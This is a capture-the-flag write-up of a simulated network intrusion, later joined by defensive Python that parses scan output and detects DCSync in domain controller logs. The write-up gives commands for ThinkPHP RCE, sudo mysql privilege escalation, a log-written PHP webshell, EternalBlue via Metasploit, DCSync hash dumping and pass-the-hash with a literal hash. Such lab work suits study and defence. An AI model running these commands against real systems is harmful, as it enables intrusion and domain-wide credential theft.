
Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Initial writeup


After starting the target machine, there is a login interface with a ThinkPHP icon. Just test it directly.

The 5.0.23 RCE exists.

Let's check the environment: PHP 7.4.3. Take a look at disable_functions:

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_weexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare

Upload right away; the AntSword connection has www-data permissions, so you have to find a way to escalate privileges and get into /root.

I found some articles on an official account I followed before. The Web Security Tools Library is quite complete: 《Linux提权备忘录》 (Linux Privilege Escalation Cheat Sheet).

Trying cat /etc/sudoers gives Permission denied; switch to sudo -l to view it.

This website can serve as a reference for the sudo command privilege escalation.

It can be done with mysql: sudo mysql -e '! cat /root/flag/flag01.txt' gets the first part of the flag.

Check the IP with ifconfig.

Upload fscan and scan the C-class (/24) segment: ./fscan_amd64 -h 172.22.1.1/24; the result is in result.txt in the current directory.

172.22.1.18:3306 open
172.22.1.2:88 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
[*] 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] 172.22.1.21 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] NetInfo:
[*]172.22.1.21
[-]XIAORANG-WIN7
[-]172.22.1.21
[+] NetInfo:
[*]172.22.1.18
[-]XIAORANG-OA01
[-]172.22.1.18
[+] NetInfo:
[*]172.22.1.2
[-]DC01
[-]172.22.1.2
[*] 172.22.1.2 [+]DC XIAORANG\DC01 Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] 172.22.1.18 XIAORANG\XIAORANG-OA01 Windows Server 2012 R2 Datacenter 9600
[*] 172.22.1.21 __MSBROWSE__\XIAORANG-WIN7 Windows 7 Professional 7601 Service Pack 1
[*] WebTitle:http://172.22.1.18 code:302 len:0 title:None Jump url: http://172.22.1.18?m=login
[*] WebTitle:http://172.22.1.18?m=login code:200 len:4012 title:Sign call collaborative office system
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

.15 doesn't need to be looked at; .21 is a Win7 with EternalBlue, .18 is a Xinhu OA system, and .2 is the domain controller.

Proxy forwarding with NPS + Proxifier; look at .18 first.

There are two ways to do it. The first targets a file upload vulnerability in Xinhu OA; you can refer to Y4tacker's article. Just log in with the weak password admin/admin123 and run the exp.

The second is to log in to /phpmyadmin directly with root/root and then write a webshell via the logs.

Step one: execute show variables like 'general%'; to check whether the log is enabled and where the log is stored.

Step two: set global general_log=ON; to turn on the log.

Step three: set global general_log_file to set the log save location.

Finally, select '?php eval($_POST[cmd]);'; writes it; then connect with AntSword. The flag is under C:/Users/Administrators/flag.

Next, .21 is a Win7 machine; MS17-010 can be used. After trying it, the machine has no outbound network access, so use a bind (forward) listener.

First hang the proxy: proxychains msfconsole to route the traffic over socks5, then:

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

After getting a bind meterpreter shell, the next step is DCSync.

You can refer to this article for an introduction to DCSync. Its biggest feature is that it can obtain data from the domain controller without logging in to the domain controller.

Directly load kiwi in MSF, then kiwi_cmd 'lsadump::dcsync /domain:xiaorang.lab /all /csv' exports the hashes of all users in the domain.

Earlier the scan showed .2 with port 445 open. Use SMB pass-the-hash directly with the crackmapexec that comes with Kali: proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x '$cmd'. The last part of the flag is under /Users/Administrators/flag.

Original link: http://119.45.47.125/index.php/2022/11/24/yunjing-4/
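As an added example (not part of the original post or of fscan itself): a small Python parser that folds fscan's line-oriented output, in the exact shape quoted above, into one record per host and orders hosts for response work. The sample text is constructed to mirror the writeup's scan; the regexes cover only the line types that appear on this page.

```python
import re
# Constructed sample in the format fscan prints, mirroring the writeup's 172.22.1.0/24 scan.
SAMPLE = """\
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.15:80 open
[*] 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] 172.22.1.21 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] NetInfo:
[*]172.22.1.21
   [-]XIAORANG-WIN7
   [-]172.22.1.21
[*] 172.22.1.2 [+]DC XIAORANG\\DC01 Windows Server 2016 Datacenter 14393
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
PORT_RE = re.compile(rf"^{IP}:(\d+) open$")
OS_RE = re.compile(rf"^\[\*\] {IP} \((.+)\)$")
VULN_RE = re.compile(rf"^\[\+\] {IP} (MS17-010) \((.+)\)$")
DC_RE = re.compile(rf"^\[\*\] {IP} \[\+\]DC (\S+) (.+)$")
NETINFO_IP_RE = re.compile(rf"^\[\*\]{IP}$")
NETINFO_NAME_RE = re.compile(r"^\s*\[-\](\S+)$")
POC_RE = re.compile(rf"^\[\+\] https?://{IP}\S* (poc-yaml-\S+)")

def parse_fscan(text):
    """Fold fscan's line-oriented output into one record per IP; unknown lines are ignored."""
    hosts, netinfo_ip = {}, None
    rec = lambda ip: hosts.setdefault(ip, {"ports": set(), "hostname": "", "os": "", "dc": False, "findings": []})
    for line in text.splitlines():
        if m := PORT_RE.match(line):
            rec(m[1])["ports"].add(int(m[2]))
        elif m := DC_RE.match(line):
            rec(m[1]).update(hostname=m[2], os=m[3], dc=True)
        elif m := OS_RE.match(line):
            rec(m[1])["os"] = m[2]
        elif m := VULN_RE.match(line):
            rec(m[1]).update(os=m[3]); rec(m[1])["findings"].append(m[2])
        elif m := POC_RE.match(line):
            rec(m[1])["findings"].append(m[2])
        elif m := NETINFO_IP_RE.match(line):
            netinfo_ip = m[1]              # the [-] lines that follow belong to this IP
        elif (m := NETINFO_NAME_RE.match(line)) and netinfo_ip and not re.fullmatch(IP, m[1]):
            rec(netinfo_ip)["hostname"] = m[1]   # first [-] line is the NetBIOS name, the second repeats the IP
    return hosts

def triage(hosts):
    """Response order: hosts with a flagged vulnerability first, then domain controllers, then the rest."""
    return sorted(hosts, key=lambda ip: (not hosts[ip]["findings"], not hosts[ip]["dc"], ip))
```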
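The DCSync step above is exactly what a domain controller's Security log can surface. As an added, defender-side example that is not from the post: a detection over constructed event 4662 records that flags any non-DC account exercising the directory replication extended rights. The event records and the user names in them are made up; the three rights GUIDs are the well-known Active Directory values.

```python
import re

# Extended-rights GUIDs a replication (DCSync) request exercises; 4662 lists them in Properties.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed 4662 records (field names as exported from a DC's Security log), not real telemetry.
SAMPLE_EVENTS = [
    # DC01 pulling changes for the domain naming context: normal controller-to-controller replication
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectDomainName": "XIAORANG",
     "ObjectName": "DC=xiaorang,DC=lab",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # an ordinary user account exercising the same rights on the naming context: this is the DCSync signature
    {"EventID": 4662, "SubjectUserName": "win7-user", "SubjectDomainName": "XIAORANG",
     "ObjectName": "DC=xiaorang,DC=lab",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # an unrelated 4662 with no replication GUIDs must not fire
    {"EventID": 4662, "SubjectUserName": "win7-user", "SubjectDomainName": "XIAORANG",
     "ObjectName": "CN=Users,DC=xiaorang,DC=lab",
     "Properties": "Read Property {bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

def dcsync_alerts(events, allowlist=frozenset()):
    """One alert per 4662 event in which a non-DC account exercised replication rights.

    Machine accounts (ending in '$') replicate with each other legitimately; the allowlist
    is for known replication-capable service accounts (e.g. an Azure AD Connect account)
    and is supplied by the defender, lower-cased.
    """
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        user = ev.get("SubjectUserName", "")
        if user.endswith("$") or user.lower() in allowlist:
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & REPLICATION_RIGHTS.keys())
        if rights:
            alerts.append({"user": f"{ev.get('SubjectDomainName', '')}\\{user}",
                           "object": ev.get("ObjectName", ""), "rights": rights})
    return alerts
```

In production the same rule should also require the object to be the domain naming context, since Get-Changes on other objects is far less telling.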
